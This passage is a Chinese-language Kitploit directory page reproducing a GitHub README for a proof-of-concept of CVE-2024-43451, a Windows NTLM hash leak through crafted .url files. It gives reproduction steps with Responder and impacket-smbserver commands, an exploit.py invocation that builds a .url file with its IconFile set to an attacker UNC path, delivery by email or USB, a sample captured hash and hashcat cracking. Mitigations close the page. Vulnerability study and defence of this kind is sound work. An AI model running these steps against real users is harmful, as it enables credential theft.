Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — CVE复现:cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
工具/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
密码破解钓鱼工具侦察漏洞分析漏洞利用信息收集学习与教育实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

CVE复现:cve-2024-43451-ntlm_hash_disclosure_reproduction

查看仓库
61个月前尚未审核

CVE-2024-43451 — Windows NTLM 哈希泄露欺骗漏洞

概述

CVE-2024-43451 是一个 Windows 中的 NTLMv2 哈希泄露欺骗漏洞。它允许未经身份验证的远程攻击者通过诱使受害者与恶意的 .url 快捷方式文件交互来泄露受害者的 NTLM 哈希。触发该漏洞所需的用户交互极少——只需右键单击、删除或移动文件就足以泄露哈希。其 CVSS 评分为 6.5(中等),且已在野外被积极利用。CISA 已将其列入已知被利用漏洞(KEV)目录。

技术细节

NTLM 身份验证

NTLM(NT LAN Manager)是 Windows 使用的一种质询-响应身份验证协议。当客户端尝试通过 SMB 访问资源时,客户端和服务器会执行一次握手:

  1. 客户端发送包含支持能力的 NEGOTIATE_MESSAGE。
  2. 服务器响应一个包含 8 字节随机数(服务器质询)的 CHALLENGE_MESSAGE。
  3. 客户端响应一个包含 NTLMv2 哈希的 AUTHENTICATE_MESSAGE——这是质询与用户密码哈希、用户名和域组合的 HMAC-MD5 结果。

如果攻击者能够观察或触发对其控制机器的 NTLM 身份验证尝试,捕获的 AUTHENTICATE_MESSAGE 可以离线破解以恢复明文密码。

.url 文件格式

.url 文件是 Internet Explorer 和 Windows Explorer 用于存储链接的快捷方式文件。它是一个 INI 格式的文件,包含 [InternetShortcut] 部分。用于利用的关键字段是:

  • URL= — Windows 将打开的目标 URL。
  • IconFile= — 指向图标资源的可选 UNC 路径。当 Windows Explorer 渲染该文件时,它会自动尝试从远程共享检索图标,从而触发向攻击者服务器的 NTLM 身份验证尝试。

攻击向量

攻击者创建一个 .url 文件,其 IconFile 参数指向 \\attacker-ip\share\icon.ico。当受害者:

  • 右键单击该文件(Windows Explorer 获取图标用于上下文菜单),
  • 移动或复制该文件(重新读取图标),或
  • 删除该文件(为回收站对话框获取图标),

Windows Explorer 会尝试从 UNC 路径加载图标,将受害者的 NTLMv2 哈希发送给攻击者的 SMB 监听器(例如 Responder)。

受影响版本

2024 年 11 月补丁星期二更新之前的所有受支持 Windows 版本:

  • Windows 10(所有版本)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • 较旧的不受支持版本也可能存在漏洞,但不会收到补丁。

利用设置

要求

  • 攻击机:Linux 或 Windows,配备 SMB 捕获工具(例如 Responder、Impacket 的 smbserver 或 Inveigh)。
  • 受害机:任何未打补丁的 Windows 系统。
  • 网络访问:受害者必须能够通过端口 445(SMB)访问攻击者的 IP。

工具

工具描述
ResponderLLMNR/NBT-NS/mDNS 中毒工具,内置 SMB 服务器用于哈希捕获
Impacketsmbserver.py 可用于托管简单的 SMB 共享

复现步骤

1. 启动 SMB 监听器(攻击机)

使用 Responder:

root@kitploit:~
sudo responder -I eth0 -v

或使用 Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. 生成恶意 .url 文件

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. 将文件传递给受害者

  • 电子邮件附件、USB 投递、文件共享或网络下载。

4. 受害者交互

以下任何操作都会触发哈希泄露:

  • 右键单击 → 为上下文菜单获取图标 → 向攻击者发送 NTLM 握手
  • 删除 → 为确认对话框获取图标
  • 移动/复制 → 从 UNC 路径重新读取图标
  • 在详细信息或图标视图中简单查看文件夹(图标加载)

5. 捕获哈希

攻击者的 SMB 监听器收到 NTLMv2 哈希:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. 破解哈希(离线)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

概念验证

root@kitploit:~
# 参见本仓库中的 exploit.py 以获取完整的 PoC 实现。
# 该脚本生成一个 .url 文件,其中 IconFile 设置为:
#   \\192.168.1.100\share\icon.ico
# 并可选择通过 IconIndex 设置自定义显示图标。

缓解措施

参考

  • 微软安全响应中心 — CVE-2024-43451
  • CISA 已知被利用漏洞目录
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — 针对乌克兰的攻击
  • UAC-0194 / SparkRAT 活动分析
下载工具
Inveigh
基于 PowerShell 的 Windows NTLM 捕获工具
缓解措施描述
应用 2024 年 11 月补丁安装来自 KB5044285 的微软安全更新
阻止出站 SMB(端口 445)防止 NTLM 哈希离开网络边界
尽可能禁用 NTLM仅使用 Kerberos 身份验证
启用 SMB 签名即使哈希被捕获也能防止中继攻击
用户安全意识培训教育用户不要与意外的 .url 文件交互
限制 .url 文件处理使用组策略阻止 .url 文件的执行或通过电子邮件传递